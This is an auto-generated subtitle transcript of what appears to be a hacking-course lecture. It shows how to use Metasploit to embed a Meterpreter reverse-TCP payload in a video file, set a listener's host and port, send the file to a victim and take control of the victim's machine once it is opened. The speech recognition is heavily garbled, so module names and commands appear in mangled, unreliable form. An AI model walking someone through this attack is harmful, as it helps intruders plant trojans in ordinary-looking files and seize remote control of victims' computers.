1
00:00:06,470 --> 00:00:13,040
Welcome. In this lecture we are going to see how to embed our malware in a normal audio file.

2
00:00:13,310 --> 00:00:17,360
As you know -- have become really common in everyday work.

3
00:00:17,750 --> 00:00:23,690
It's hard to imagine business proposals without video of the plea deal format is usually in almost all

4
00:00:23,690 --> 00:00:26,720
companies who share a business deals.

5
00:00:26,720 --> 00:00:32,230
Company brochures and even invitations previous years.

6
00:00:32,250 --> 00:00:39,260
We are not good for the beauty of rulers as they will be nobody's ever published that ad buffer overflow.

7
00:00:39,280 --> 00:00:48,040
Nobody in watching prior to watching 9 a lot of the attacks will observe trying to abuse the book by

8
00:00:48,040 --> 00:00:53,950
using social engineering or by posting malicious -- on the Internet.

9
00:00:55,150 --> 00:01:02,560
Just the simple act of opening the -- could exploit a celebrity to automatically download malicious

10
00:01:02,560 --> 00:01:09,970
code from the Internet and display L'Equipe video file to trick you into believing that nothing wrong

11
00:01:09,970 --> 00:01:10,570
has happened.

12
00:01:12,130 --> 00:01:20,400
As you can see in the chart the percentage of the attack is increasing your audience so let's see how

13
00:01:20,400 --> 00:01:25,100
the hackers embed their payload in normal video file.

14
00:01:25,120 --> 00:01:32,660
Here we are going to use my dad's plate framework to create a malicious beauty of open air terminal

15
00:01:32,830 --> 00:01:44,070
and type a massive console to start metabolite next year when to use a low underscored video underscored

16
00:01:44,210 --> 00:01:47,450
embittered underscored equally underscored.

17
00:01:47,520 --> 00:01:55,020
No javascript model to create a malicious parody of which is modified version of an operative embedded

18
00:01:55,170 --> 00:01:55,830
yikes.

19
00:01:56,060 --> 00:01:57,820
Social engineering.

20
00:01:57,890 --> 00:02:05,060
This version does not require javascript to be enabled and does not require that you seek to be a better

21
00:02:05,190 --> 00:02:11,490
deputy of the E C is embedded in the beauty of in a non-standard method.

22
00:02:11,540 --> 00:02:24,570
Using hex and coding now to use the model I use exploit slash windows slash file format slash Hello

23
00:02:25,050 --> 00:02:31,810
underscore the beauty of this code embittered and thus go easy on does score Lord jealous grip.

24
00:02:33,780 --> 00:02:40,970
Now to see the options of this module type show options.

25
00:02:41,200 --> 00:02:45,910
Here we can see the default name of our payload and video file.

26
00:02:46,840 --> 00:02:57,410
If you want to use different name to your video type set by name now enter the name which you want to

27
00:02:57,420 --> 00:03:06,580
you hear how an important next we need to set which type of payload we are going to use.

28
00:03:06,590 --> 00:03:14,630
So here we are using Windows slash with reporter slash was underscored DCP

29
00:03:17,290 --> 00:03:20,470
no enter the local IP or port.

30
00:03:20,650 --> 00:03:30,790
Listen on the machine so to get your local MP open a new terminal and a if config.

31
00:03:30,850 --> 00:03:35,890
Here is a local whose IP address copy and paste here.

32
00:03:37,530 --> 00:03:48,230
Similarly to set a port on which the connection is to listen for routine type set and port.

33
00:03:52,150 --> 00:03:55,030
Next when you create your video file

34
00:03:57,890 --> 00:04:06,180
as you can see the file is created and saved in that Amazon for No.

35
00:04:06,280 --> 00:04:14,460
To see the payload open a new terminal type duty dot Amazon for Slash.

36
00:04:14,470 --> 00:04:17,910
Local.

37
00:04:19,240 --> 00:04:31,050
Here is our malicious beauty file no to copy this file to a sleeker type CB important not a slash is

38
00:04:31,090 --> 00:04:33,330
legal.

39
00:04:33,400 --> 00:04:35,380
Let's check in with this record.

40
00:04:36,420 --> 00:04:38,030
Here is our file.

41
00:04:38,100 --> 00:04:41,660
Next we need to send this file with the machine.

42
00:04:41,660 --> 00:04:47,820
So before going to send this file to victim flesh we need to create a handler to listen it was connection

43
00:04:48,800 --> 00:05:03,920
type you explode slash multi slash handler no to payload type set reload windows slash water bottle

44
00:05:04,160 --> 00:05:13,590
slash reload and those cordless repeat similarly to set l host an import to listen on victim said l

45
00:05:13,600 --> 00:05:23,720
host one ninety two not one sixty eight but four to reload to do two notice that l port I said l bought

46
00:05:25,100 --> 00:05:36,630
80 no paper and I'd explode to start listen as you can see now we added two police on it it was conversion

47
00:05:38,380 --> 00:05:39,810
here again see as St..

48
00:05:39,810 --> 00:05:43,160
Malicious beautiful 2 with machine.

49
00:05:43,180 --> 00:05:44,800
Now let's try to open this

50
00:05:47,950 --> 00:05:53,990
you can see a lot of reload is executed automatically and we've got multiple position.

51
00:05:54,070 --> 00:05:54,940
You know what I mean.

52
00:05:56,620 --> 00:06:05,990
Now you can control European machine from here so that's how the hackers hack European machine by emitting

53
00:06:05,990 --> 00:06:10,270
the malware including of thank you.